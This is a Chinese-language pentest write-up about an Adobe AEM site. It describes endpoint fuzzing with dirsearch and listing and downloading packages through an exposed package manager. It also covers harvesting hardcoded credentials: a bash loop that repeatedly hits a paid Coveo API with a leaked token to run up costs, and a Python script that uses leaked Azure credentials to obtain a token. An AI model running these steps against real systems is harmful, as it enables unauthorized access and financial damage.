首页 时事 民生 政务 教育 文化 科技 财富 体娱 健康 情感
更多
旅行 百科 职场 楼市 企业 乐活 学术 汽车 时尚 创业 美食 幽默 美体 文摘

通过高效的侦察发现关键漏洞接管整个IT基础设施

文化   2025-01-13 12:01   美国  

扫码领资料

获网安教程


Track安全社区投稿~  

赢千元稿费!还有保底奖励~(https://bbs.zkaq.cn)

在这篇文章中, 我将深入探讨我是如何通过详细分析和利用暴露的端点、硬编码的凭据以及配置错误的访问控制,成功获取目标组织关键IT基础设施和云服务访问权限的全过程。

我们先提到目标网站的名称 https://*sub.domain*.com[1]

在我的主动侦察中,我发现目标使用 AEM 作为内容管理系统 (CMS),并且由 Java 驱动

img

首先,我收集了用于 AEM CMS 和 JSP 的字典以及端点

然后,我进行了模糊测试 (fuzzing),并发现了一些有用的端点。

/crx/packmgr/index.jsp/etc.feed.xml/crx/bin.ext.json/crx/.ext.infinity.json

当我发现 /etc.feed.xml 时,找到了相关内容。

img

然后引起我注意的是这个 URL:

https://sub.domain.com/etc/packages.feed.xml[2] 发现了许多包,这些包的格式如下:

https://sub.domain.com/etc/packages/{groupOfPackage}/{nameOfPackage}.zip

访问任何符合该格式的 URL 都可以下载任意包, 但在深入研究这些包后,没有发现任何有趣的内容

然后再次回到使用 JSP 字典对有趣的端点进行模糊测试。

dirsearch -u https://sub.domain.com/crx/packmgr/ --random-agent -i 200 -w jsp.txt

发现了这个端点:https://sub.domain.com**/crx/packmgr/service.jsp**

img

我请我的朋友协助执行操作。然而,我们发现用户是 anonymous(匿名用户),除了通过添加 cmd 参数列出所有包之外,无法执行任何其他操作。

https://sub.domain.com/crx/packmgr/service.jsp?cmd=ls

img
检索到约 1173 个包和约 100 个配置包。
想起可以使用以下格式下载这些包:
https://sub.domain.com/etc/packages/{groupOfPackage}/{nameOfPackage}.zip
于是,我编写了一个简单的脚本来下载所有包。然后,我深入研究了配置包发现了大量硬编码的凭据
1- 泄露了所有作者的邮箱
img
2- Covo 服务配置(付费服务)
img
for i in {1..10000}; do  curl -X GET "https://platform.cloud.coveo.com/rest/search/v2?organizationId={clientId}&q=*" \    -H "Authorization: Bearer {accesstoken}" \    -H "Content-Type: application/json";done
我可以通过使用简单的 bash 脚本让组织损失大量资金,因为这个访问令牌是有效的。
3- 有效的凭据用于 API 管理并提供对托管在 https://sub3**.domain.com** 上的仓库的访问。**
img
img
4- ARIA-azure-凭据
img
import requests
# Define the authentication parameterstenant_id = "{tenant_id}"client_id = "{client_id}"client_secret = "{client_secret}"scope = "https://sub.cloudapp.domain.com/.default"
# URL to get the OAuth tokentoken_url = f"https://login.microsoftonline.com/{tenant_id}/oauth2/v2.0/token"
# Define the request payloadpayload = {    "grant_type": "client_credentials",    "client_id": client_id,    "client_secret": client_secret,    "scope": scope}
# Make a POST request to get the tokenresponse = requests.post(token_url, data=payload)
# Check if the request was successfulif response.status_code == 200:    # Parse the JSON response    token_response = response.json()    access_token = token_response.get("access_token")    print("Access Token:", access_token)else:    # If the request failed, print the error    print("Failed to get the access token:", response.status_code, response.text)
这个 Python 脚本使用凭据检索 OAuth 访问令牌,以便与 api 交互,访问 https://sub.cloudapp.domain.com/
5- ServiceNow[3](IT 服务管理)
通过使用这些泄露的凭据,我拥有所有权限(创建、删除、编辑)
img
img
img
img

声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权

如果你是一个网络安全爱好者,欢迎加入我的知识星球:zk安全知识星球,我们一起进步一起学习。星球不定期会分享一些前沿漏洞,每周安全面试经验、SRC实战纪实等文章分享,微信识别二维码,即可加入。
白帽子左一
零基础也能学渗透!关注我,跟我一启开启渗透测试工程师成长计划.专注分享网络安全知识技能.
 最新文章
混淆Mimikatz下载器以规避Defender检测
记一次Self XSS+CSRF组合利用
记一次IDOR 和访问控制缺失漏洞挖掘
掌控安全特邀嘉宾课 | 红队基础设施漫谈
从路径遍历到RCE
基于Electron的应用程序安全测试基础 — 提取和分析.asar文件的案例研究
基于 Electron 应用的安全测试基础 — 提取和分析 .asar 文件
Electron的应用安全测试基础 | 安装与检测基于Electron的应用程序
Electron 应用安全测试基础 | Electron 框架介绍
Electron 应用安全测试基础 | Electron 框架介绍
从用户注册绕过到纵向权限提升接管SaaS平台
通过高效的侦察发现关键漏洞接管整个IT基础设施
通过高效的侦察发现关键漏洞接管整个IT基础设施
从低危Blind SSRF到严重漏洞
2025掌控安全第七届封神台CTF WriteUp
2025掌控安全第七届封神台CTF WriteUp
从js到高危垂直越权漏洞挖掘
从信息收集到使用弱密码登录获取P1漏洞
第七届封神台CTF来袭!
掌控安全特邀嘉宾课 | 后渗透利用助力安全设备再突破
第七届封神台CTF来袭!
掌控安全特邀嘉宾课 | 后渗透利用助力安全设备再突破
2025元旦快乐 | 第七届封神台CTF来袭!
掌控安全特邀嘉宾课 | 后渗透利用助力安全设备再突破
从CloudFlare配置错误到登录管理后台
AI安全 | 用文字攻击 AI
【$$$$】挖掘Google Slides 中的IDOR
对智能手表进行逆向工程
绕过 SAML 认证接管管理面板
一文理解条件竞争漏洞
【$$$$】从信息收集到攻破Okta
使用 SSO 登录进行帐户接管
漏洞挖掘 | Swagger UI 目录枚举小总结
高级渗透测试 | 南昌
实时聊天系统 | 利用配置错误泄露敏感信息
滥用工单系统中的动态占位符泄露用户数据
【$25000】利用Zendesk Nday获取漏洞赏金
使用SSO登录实现账户接管
Google Dorking在OSINT中的一些妙用
安全学院24期开班福利!大咖嘉宾课、poc知识星球免费送
高级渗透测试 | 南昌
两个硬编码凭证导致接管漏洞案例
安全学院24期开班福利!大咖嘉宾课、poc知识星球免费送
高级渗透测试 | 南昌
安全学院24期开班福利!大咖嘉宾课、poc知识星球免费送
使用Azure CDN进行子域名接管
高级渗透测试 | 南昌
数据安全:挖掘隐藏端点中的敏感信息泄露
高级渗透测试 | 南昌
一次ASP.NET站点文件上传bypass
 分类
时事
民生
政务
教育
文化
科技
财富
体娱
健康
情感
旅行
百科
职场
楼市
企业
乐活
学术
汽车
时尚
创业
美食
幽默
美体
文摘
 原创标签
时事 社会 财经 军事 教育 体育 科技 汽车 科学 房产 搞笑 综艺 明星 音乐 动漫 游戏 时尚 健康 旅游 美食 生活 摄影 宠物 职场 育儿 情感 小说 曲艺 文化 历史 三农 文学 娱乐 电影 视频 图片 新闻 宗教 电视剧 纪录片 广告创意 壁纸头像 心灵鸡汤 星座命理 教育培训 艺术文化 金融财经 健康医疗 美妆时尚 餐饮美食 母婴育儿 社会新闻 工业农业 时事政治 星座占卜 幽默笑话 独立短篇 连载作品 文化历史 科技互联网
 发布位置
广东 北京 山东 江苏 河南 浙江 山西 福建 河北 上海 四川 陕西 湖南 安徽 湖北 内蒙古 江西 云南 广西 甘肃 辽宁 黑龙江 贵州 新疆 重庆 吉林 天津 海南 青海 宁夏 西藏 香港 澳门 台湾 美国 加拿大 澳大利亚 日本 新加坡 英国 西班牙 新西兰 韩国 泰国 法国 德国 意大利 缅甸 菲律宾 马来西亚 越南 荷兰 柬埔寨 俄罗斯 巴西 智利 卢森堡 芬兰 瑞典 比利时 瑞士 土耳其 斐济 挪威 朝鲜 尼日利亚 阿根廷 匈牙利 爱尔兰 印度 老挝 葡萄牙 乌克兰 印度尼西亚 哈萨克斯坦 塔吉克斯坦 希腊 南非 蒙古 奥地利 肯尼亚 加纳 丹麦 津巴布韦 埃及 坦桑尼亚 捷克 阿联酋 安哥拉